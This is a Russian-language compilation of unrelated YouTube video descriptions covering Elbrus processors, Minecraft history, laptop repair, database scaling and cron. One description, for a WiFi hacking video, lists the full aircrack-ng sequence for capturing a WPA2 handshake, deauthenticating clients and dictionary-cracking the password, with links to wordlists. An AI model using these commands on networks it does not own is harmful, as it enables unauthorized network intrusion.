— Немного истории: как появилась компания МЦСТ — основные вехи.
— Что сделано на сегодня: линейки процессоров, особенности архитектуры Эльбрус, оценка производительности.
— Планы на ближайшее будущее, новые модели процессоров.
— Когда можно ожидать появления массовых и дешёвых машин на основе процессоров Эльбрус.
Приветствую! Это видео я готовил почти 3 недели. Оно представляет собой своеобразный «документальный фильм», посвященный истории майнкрафт. В нем мы отследим развитие игры, начиная с тех времен когда она носила другое название, и заканчивая майнкрафт 1.16. В этом видео есть огромное количество интересных фактов и открытий, касающихся старых версий: классик, индев и других. Мы узнаем, когда же появилось первое меню майнкрафт, кто был самым старым мобом и многое другое. Это только первая часть, планируется трилогия. 11 лет майнкрафт.
Кто я такой? Я — Мс кус, ютубер, стример и рэпер. Снимаю различные видео по играм (в основном minecraft) и читаю рэп (всякие угарные клипы делаю, ну или просто там картинка и музыка играет). В майнкрафте в основном играю в мини игры — скай варс, бед варс, билдбатл и другие. Также могу снять рэп про майнкрафт! За постандеграунд шарю, шаблонных ютуберов презираю. Майнкрафт обновление
На ремонте сегодня ноутбук Acer A315 на процессоре AMD Ryzen 5 от подписчика из Москвы. Аппарат был залит и побывал в руках вандалов. Но я попробую дать ему вторую жизнь…
Мой телеграмм-канал: pcexpert86
Группа в контакте: vk.com/lpcexpert
Instagram: pcexpert86
Чтобы отправить ноутбук на ремонт, пишите:
ВК — vk.com/pcexpert86
Почта — dark_ice_05@mail.ru
Купить видеокурс по ремонту ноутбуков — практическое руководство: goo.gl/fvZ2V1
Разрабатывая какой-либо проект рано или поздно мы можем столкнуться с проблемой нагрузки на БД. Данных может быть очень много, а мы как-то должны выдерживать нагрузки и должны быть готовы к её росту.
В своём докладе я поделюсь опытом масштабирования БД, расскажу всё максимально подробно — с какими проблемами можно столкнуться, какие стратегии и подходы лучше всего заложить в проекте.
…
● В этом ролике я покажу, что ни одну WiFi сеть нельзя считать защищенной. Так как проверка моей сети показала то, что доступ к сети может получить кто угодно. В этом ролике я покажу, как я это сделал.
● Это постановочный ролик, не имеющий никакого отношения к реальной жизни. Всё происходящее в ролике — выполнено используя средства монтажа. Всё происходящее в ролике — творческая выдумка автора. Все действия придуманы, а любые наименования ПО — вымышленны. Любые сходства с реальностью — не более чем случайность. В реальной же жизни, любые подобные действия строго запрещены! Исключением является цель проверки системы на безопасность, получив одобрение владельца сети.
● Снял продолжение: брутфорс со скоростью до 500 000 тыс паролей в секунду используя видеокарту: goo.gl/HbDh8i
● Порядок команд:
— ifconfig
— airmon-ng check kill
— airmon-ng start wlan0
— airodump-ng wlan0mon
— airodump-ng --bssid [MAC адрес точки доступа – без скобок!] --channel 1 -w wifi wlan0mon
— aireplay-ng --deauth 20 -a [MAC точки доступа] -c [MAC подключенного клиента] wlan0mon
— wpaclean ИмяНовогоФайла ИмяСтарогоФайла
— aircrack-ng -w [ПутьКСловарю] -b [MAC точки доступа] [ЧистыйХэндшейк .cap]
● Набор словарей:
— goo.gl/z7mnhf — Даты, использовать первым
— goo.gl/4BBPQy — Номера Телефонов RUS, использовать вторым
— goo.gl/bVsfo2 — Элитный словарь от InsidePRO
— goo.gl/Ab2fTE — Дополнительный словарь на 9 млн. слов
— ● В ролике "{100%} Как взломать любой WiFi? | WPA2 | Kali Linux | Как защититься от взлома? | UnderMind" — я рассказываю об информационной безопасности. И о реальной уязвимости всех сетей. Существует множество способов получения доступа к сети WiFi, в том числе социальная инженерия или уязвимости в WPS, но об этом как-нибудь в другой раз. И сейчас поговорим о самом надежном (на мой взгляд) методе, который сработает со 100% вероятностью.
● Сама проверка у нас подразделяется на 2 части. Первая: это захват хендшейка или рукопожатия. В понятии WiFi сетей это что-то вроде «Привет, чувак. Подключи меня», «Привет. Какой пароль?», «Пароль: Блаблабла». Мы прослушиваем эти данные, но поскольку пароль передается в зашифрованном виде, мы переходим ко второму этапу. А именно: к расшифровке хендшейка.
Всё делать мы будем на Kali Linux.
Первой командой смотрим интерфейс нашего WiFi адаптера
ifconfig
Выбираем тот, который отвечает за WiFi, это как правило самый последний.
Переводим наш WiFi адаптер в режим монитора. В этом режиме он будет ловить все пакеты WiFi, даже предназначенные другим устройствам. Делаем это командой:
Продолжение в ролике…
В каком формате записываются задачи планировщика cron, где лежат файлы запланированных задач для новых установленных программ, и куда класть скрипты для их выполнения ежечасно, ежедневно, еженедельно и ежемесячно.